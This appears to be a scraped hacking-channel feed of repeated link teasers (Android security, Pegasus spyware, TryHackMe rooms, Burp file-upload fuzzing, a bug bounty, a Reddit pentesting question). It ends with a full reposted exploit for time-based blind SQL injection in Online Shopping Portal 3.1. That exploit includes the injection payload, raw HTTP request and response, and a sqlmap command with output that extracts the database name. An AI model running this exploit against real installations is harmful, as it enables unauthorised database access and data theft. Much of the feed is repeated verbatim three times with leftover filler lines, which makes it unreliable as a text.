Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Android security
https://cdn-images-1.medium.com/max/600/1*bSOt6IzygWc3PNepTObg1Q.jpeg
In this post I’m going to tell you about basics of Android security that everyone should know.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Android security
https://cdn-images-1.medium.com/max/600/1*bSOt6IzygWc3PNepTObg1Q.jpeg
In this post I’m going to tell you about basics of Android security that everyone should know.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Android security
In this post I’m going to tell you about basics of Android security that everyone should know.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
How to Become a Hacker!?
https://cdn-images-1.medium.com/max/1200/0*LA0m2kPjuUk53gyJ
This generated text is 91% unique.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
How to Become a Hacker!?
https://cdn-images-1.medium.com/max/1200/0*LA0m2kPjuUk53gyJ
This generated text is 91% unique.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
How to Become a Hacker!?
This generated text is 91% unique.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Pegasus!
https://cdn-images-1.medium.com/max/696/1*t90b90b7_2yqXqwpd-8rGA.jpeg
Pegasus spyware!! Pegasus!! everywhere on the internet now,isn’t it? What is project Pegasus? Why foreign governments are using it? Why it…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Pegasus!
https://cdn-images-1.medium.com/max/696/1*t90b90b7_2yqXqwpd-8rGA.jpeg
Pegasus spyware!! Pegasus!! everywhere on the internet now,isn’t it? What is project Pegasus? Why foreign governments are using it? Why it…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Pegasus!
Pegasus spyware!! Pegasus!! everywhere on the internet now,isn’t it? What is project Pegasus? Why foreign governments are using it? Why it…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
TryHackMe: Tutorial de Nmap
Review de los ejercicios que aparecen en la room de Nmap de TryHackMe.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
TryHackMe: Tutorial de Nmap
Review de los ejercicios que aparecen en la room de Nmap de TryHackMe.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
TryHackMe: Tutorial de Nmap
Review de los ejercicios que aparecen en la room de Nmap de TryHackMe.
HydraSwap Beta Bug Bounty Program
Earn up to $5,000 as RewardsContinue reading on Medium »
Read more...
Earn up to $5,000 as RewardsContinue reading on Medium »
Read more...
HydraSwap Beta Bug Bounty Program
https://hydraswap.medium.com/hydraswap-beta-bug-bounty-program-90c2ad96567?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://hydraswap.medium.com/hydraswap-beta-bug-bounty-program-90c2ad96567?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
HydraSwap Beta Bug Bounty Program
Earn up to $5,000 as Rewards
Earn up to $5,000 as RewardsContinue reading on Medium » (https://hydraswap.medium.com/hydraswap-beta-bug-bounty-program-90c2ad96567?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
HydraSwap Beta Bug Bounty Program
Earn up to $5,000 as Rewards
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Metamorphosis
https://cdn-images-1.medium.com/max/676/0*rmUxHeaGMt7-PtFa.png
Room link: https://tryhackme.com/room/metamorphosis
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Metamorphosis
https://cdn-images-1.medium.com/max/676/0*rmUxHeaGMt7-PtFa.png
Room link: https://tryhackme.com/room/metamorphosis
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Metamorphosis
Room link: https://tryhackme.com/room/metamorphosis
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Fuzzing File Uploads With Burp Intruder
https://cdn-images-1.medium.com/max/1780/1*cAcj8nSKjKVCiAE59Pelcw.png
Apps and websites often need to allow users to upload files for various reasons.
Continue reading on Geek Culture »
___________________________
@hacking_Attack
@Hacking_Video
Fuzzing File Uploads With Burp Intruder
https://cdn-images-1.medium.com/max/1780/1*cAcj8nSKjKVCiAE59Pelcw.png
Apps and websites often need to allow users to upload files for various reasons.
Continue reading on Geek Culture »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Fuzzing File Uploads With Burp Intruder
Apps and websites often need to allow users to upload files for various reasons. Sometimes users need to upload arbitrary files, such as on…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
United States Announces Crypto-Reward Program for Information Relating to Malicious Cyber Activity
https://cdn-images-1.medium.com/max/2048/1*0C4AQ29axXeux6viudaAQA.jpeg
On July 15, 2021, the United States State Department announced a program through Rewards for Justice that offers up to $10 million in…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
United States Announces Crypto-Reward Program for Information Relating to Malicious Cyber Activity
https://cdn-images-1.medium.com/max/2048/1*0C4AQ29axXeux6viudaAQA.jpeg
On July 15, 2021, the United States State Department announced a program through Rewards for Justice that offers up to $10 million in…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
United States Announces Crypto-Reward Program for Information Relating to Malicious Cyber Activity
On July 15, 2021, the United States State Department announced a program through Rewards for Justice that offers up to $10 million in…
Can you pentest your own domain?
https://www.reddit.com/r/Pentesting/comments/oou53p/can_you_pentest_your_own_domain/
I while back I purchased a domain through google.domains (https://google.domains/). Since I own the domain am I good to run web scans against the website being hosted on it? submitted by /u/mountainhacker1 (https://www.reddit.com/user/mountainhacker1)
[link] (https://www.reddit.com/r/Pentesting/comments/oou53p/can_you_pentest_your_own_domain/) [comments] (https://www.reddit.com/r/Pentesting/comments/oou53p/can_you_pentest_your_own_domain/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/Pentesting/comments/oou53p/can_you_pentest_your_own_domain/
I while back I purchased a domain through google.domains (https://google.domains/). Since I own the domain am I good to run web scans against the website being hosted on it? submitted by /u/mountainhacker1 (https://www.reddit.com/user/mountainhacker1)
[link] (https://www.reddit.com/r/Pentesting/comments/oou53p/can_you_pentest_your_own_domain/) [comments] (https://www.reddit.com/r/Pentesting/comments/oou53p/can_you_pentest_your_own_domain/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
Can you pentest your own domain?
I while back I purchased a domain through [google.domains](https://google.domains). Since I own the domain am I good to run web scans against the...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Online Shopping Portal 3.1 SQL Injection
https://1.bp.blogspot.com/-3PgjWVftdQ0/WWlvP-R2mXI/AAAAAAAAIM8/iBQyafDa-iYc-AHcRZlLffBv9_pWsP_-gCLcBGAs/s1600/h30.png Proof of concept code for a time-based blind remote SQL injection vulnerability in Online Shopping Portal version 3.1. This is a variant of the original discovery of SQL injection in this version by Umit Yalcin in July of 2020.
MD5 |
___________________________
@hacking_Attack
@Hacking_Video
Online Shopping Portal 3.1 SQL Injection
https://1.bp.blogspot.com/-3PgjWVftdQ0/WWlvP-R2mXI/AAAAAAAAIM8/iBQyafDa-iYc-AHcRZlLffBv9_pWsP_-gCLcBGAs/s1600/h30.png Proof of concept code for a time-based blind remote SQL injection vulnerability in Online Shopping Portal version 3.1. This is a variant of the original discovery of SQL injection in this version by Umit Yalcin in July of 2020.
MD5 |
4f65a9a04d5b6e35d86e2c743c2dc565Download # Exploit Title: Online Shopping Portal - time-based blind SQL Injection
# Date: 2021-07-09
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/shopping-portal-free-download/
# Version: 3.1
# Tested on: Windows 10, XAMPP
################
# Description #
################
# The email parameter is vulnerable to time-based SQL injection on the /check_availability.php endpoint that serves as a checker whether a new user's email is already exist within the database or not. Based on the payload used on 'email' parameter which is "email=tester@gmail.com'XOR(if(now()=sysdate(),sleep(5),0))XOR'fsx", the server response is about 5 seconds delay which mean it is vulnerable to MySQL Blind (Time Based). An attacker can use sqlmap to further the exploitation for extracting sensitive information from the database.
#####################
# PoC of detection #
#####################
Request:
========
POST /shopping/check_availability.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 65
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/shopping/login.php
Cookie: PHPSESSID=94hqeuk00aj25glgtju4105n06
Sec-GPC: 1
email=tester@gmail.com'XOR(if(now()=sysdate(),sleep(5),0))XOR'fsx
Response: duration = 340 bytes | 5,005 millis
========
HTTP/1.1 200 OK
Date: Fri, 09 Jul 2021 14:15:14 GMT
Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.24
X-Powered-By: PHP/5.6.24
Content-Length: 121
Connection: close
Content-Type: text/html; charset=UTF-8
Email available for Registration .
########################
# PoC of exploitation #
########################
# Run sqlmap to extract current database name:
$ sqlmap -u "http://localhost/shopping/check_availability.php" --data="email=tester@gmail.com" --cookie="PHPSESSID=94hqeuk00aj25glgtju4105n06" --timeout=30 -p "email" --level=3 --risk=1 --threads=10 --time-sec=5 -b --current-db --batch --answers="crack=N,dict=N,continue=Y,quit=N" --technique=T
###########
# Output #
###########
---
Parameter: email (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=tester@gmail.com' AND (SELECT 4922 FROM (SELECT(SLEEP(5)))SAxU)-- ILJB
---
[INFO] the back-end DBMS is MySQL
[INFO] fetching banner
multi-threading is considered unsafe in time-based data retrieval. Are you sure of your choice (breaking warranty) [y/N] N
[INFO] retrieved:
[WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
10.1.19-MariaDB
web server operating system: Windows
web application technology: PHP 5.6.24, Apache 2.4.23
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
banner: '10.1.19-MariaDB'
[INFO] fetching current database
[INFO] retrieved: shopping
current database: 'shopping' Source:packetstormsecurity.com___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Online Shopping Portal 3.1 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.